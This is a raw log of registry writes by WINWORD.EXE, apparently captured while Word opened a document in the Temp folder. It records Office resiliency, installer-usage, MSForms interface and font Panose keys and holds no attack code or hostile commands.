HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
{z'
7B7A2700180D0000010000000000000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1315831829
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831948
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831949
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
180D000064B3D4F936DAD40100000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
3{'
337B2700180D000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
=|'
3D7C2700180D00000600000001000000DE00000002000000CE0000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C0064006400320037006200380035003600320034006300610063003500620039003800660032003600370030006500310036003300360063003000620031003700380037006500630062003000380038003100320036006400300037003200660035003800640066006200360037006300370036006400300066006400300039002E0064006F006300000000000000
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831950
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1315831951
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1315831809
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1315831809
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1315831810
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1315831810
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP5FilesIntl_1033
1315831811
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
TCWP6FilesIntl_1033
1315831811
3352
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
VBAFiles
1315831812
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{C1BA57A2-8FAF-4C1B-8A8C-E5E6133F6191}
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\1AE244
1AE244
04000000180D00006600000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C0064006400320037006200380035003600320034006300610063003500620039003800660032003600370030006500310036003300360063003000620031003700380037006500630062003000380038003100320036006400300037003200660035003800640066006200360037006300370036006400300066006400300039002E0064006F0063004400000064006400320037006200380035003600320034006300610063003500620039003800660032003600370030006500310036003300360063003000620031003700380037006500630062003000380038003100320036006400300037003200660035003800640066006200360037006300370036006400300066006400300039002E0064006F0063000000000001000000000000003A3EBFF936DAD40144E21A0044E21A0000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{FF0767C5-260F-4D98-B453-F315CD0019B1}\2.0
Microsoft Forms 2.0 Object Library
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{FF0767C5-260F-4D98-B453-F315CD0019B1}\2.0\FLAGS
6
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{FF0767C5-260F-4D98-B453-F315CD0019B1}\2.0\0\win32
C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\TypeLib\{FF0767C5-260F-4D98-B453-F315CD0019B1}\2.0\HELPDIR
C:\Users\admin\AppData\Local\Temp\VBE
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}
Font
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}
IDataAutoWrapper
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}
IReturnInteger
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}
IReturnBoolean
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}
IReturnString
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}
IReturnSingle
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}
IReturnEffect
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}
IControl
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}
Controls
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}
IOptionFrame
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}
_UserForm
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}
ControlEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}
FormEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01}
OptionFrameEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF}
ILabelControl
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}
ICommandButton
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}
IMdcText
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}
IMdcList
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}
IMdcCombo
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}
IMdcCheckBox
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}
IMdcOptionButton
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}
IMdcToggleButton
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}
IScrollbar
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{A38BFFC3-A5A0-11CE-8107-00AA00611080}
Tab
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}
Tabs
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}
ITabStrip
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}
ISpinbutton
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C599243-6926-101B-9992-00000B65C6F9}
IImage
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSubmitButton
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLImage
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLReset
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLCheckbox
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLOption
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLText
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLHidden
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLPassword
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLSelect
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5512D125-5CC6-11CF-8D67-00AA00BDCE1D}
IWHTMLTextArea
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}
LabelControlEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}
CommandButtonEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D12-EC42-11CE-9E0D-00AA006002F3}
MdcTextEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}
MdcListEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}
MdcComboEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}
MdcCheckBoxEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3}
MdcOptionButtonEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}
MdcToggleButtonEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}
ScrollbarEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}
TabStripEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}
SpinbuttonEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}
ImageEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}
WHTMLControlEvents
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents1
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents2
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents3
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents4
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents5
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents6
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents7
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents9
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}
WHTMLControlEvents10
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}
IPage
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}
Pages
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}
IMultiPage
3352
WINWORD.EXE
write
HKEY_CLASSES_ROOT\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}
MultiPageEvents
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Courier New
02070309020205020404
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Symbol
05050102010706020507
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings
05000000000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Mincho
02020609040205080304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Batang
02030600000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun
02010600030101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU
02020500000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Gothic
020B0609070205080204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Dotum
020B0600000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimHei
02010609060101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU
02020509000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gulim
020B0600000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century
02040604050505020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Angsana New
02020603050405020304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cordia New
020B0304020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mangal
02040503050203030202
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Latha
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sylfaen
010A0502050306030303
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vrinda
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Raavi
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shruti
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gautami
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tunga
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Estrangelo Edessa
03080600000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cambria Math
02040503050406030204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Unicode MS
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tahoma
020B0604030504040204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Marlett
00000000000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Batang
02030600000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BatangChe
02030609000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@BatangChe
02030609000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gungsuh
02030600000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gungsuh
02030600000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GungsuhChe
02030609000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GungsuhChe
02030609000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DaunPenh
01010101010101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DokChampa
020B0604020202020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Euphemia
020B0503040102020104
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vani
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Gulim
020B0600000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
GulimChe
020B0609000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@GulimChe
020B0609000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Dotum
020B0600000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DotumChe
020B0609000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DotumChe
020B0609000101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Impact
020B0806030902050204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Iskoola Pota
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kalinga
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kartika
02020503030404060203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Khmer UI
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lao UI
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Console
020B0609040504020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Malgun Gothic
020B0503020000020004
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Malgun Gothic
020B0503020000020004
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo
020B0604030504040204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo
020B0604030504040204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Meiryo UI
020B0604030504040204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Meiryo UI
020B0604030504040204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Himalaya
01010100010101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft JhengHei
020B0604030504040204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft JhengHei
020B0604030504040204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft YaHei
020B0503020204020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Microsoft YaHei
020B0503020204020204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU
02020509000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU
02020500000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS
02020500000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS
02020500000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU-ExtB
02020500000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU-ExtB
02020500000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU-ExtB
02020500000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU-ExtB
02020500000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS-ExtB
02020500000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS-ExtB
02020500000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mongolian Baiti
03000500000000000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Gothic
020B0609070205080204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PGothic
020B0600070205080204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PGothic
020B0600070205080204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS UI Gothic
020B0600070205080204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS UI Gothic
020B0600070205080204
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Mincho
02020609040205080304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PMincho
02020600040205080304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PMincho
02020600040205080304
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MV Boli
02000500030200090000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft New Tai Lue
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Nyala
02000504070300020003
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft PhagsPa
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Plantagenet Cherokee
02020602070100000000
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Script
020B0504020000000003
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Semibold
020B0702040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Light
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Symbol
020B0502040204020203
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun
02010600030101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
NSimSun
02010609030101010101
3352
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@NSimSun
02010609030101010101
3352
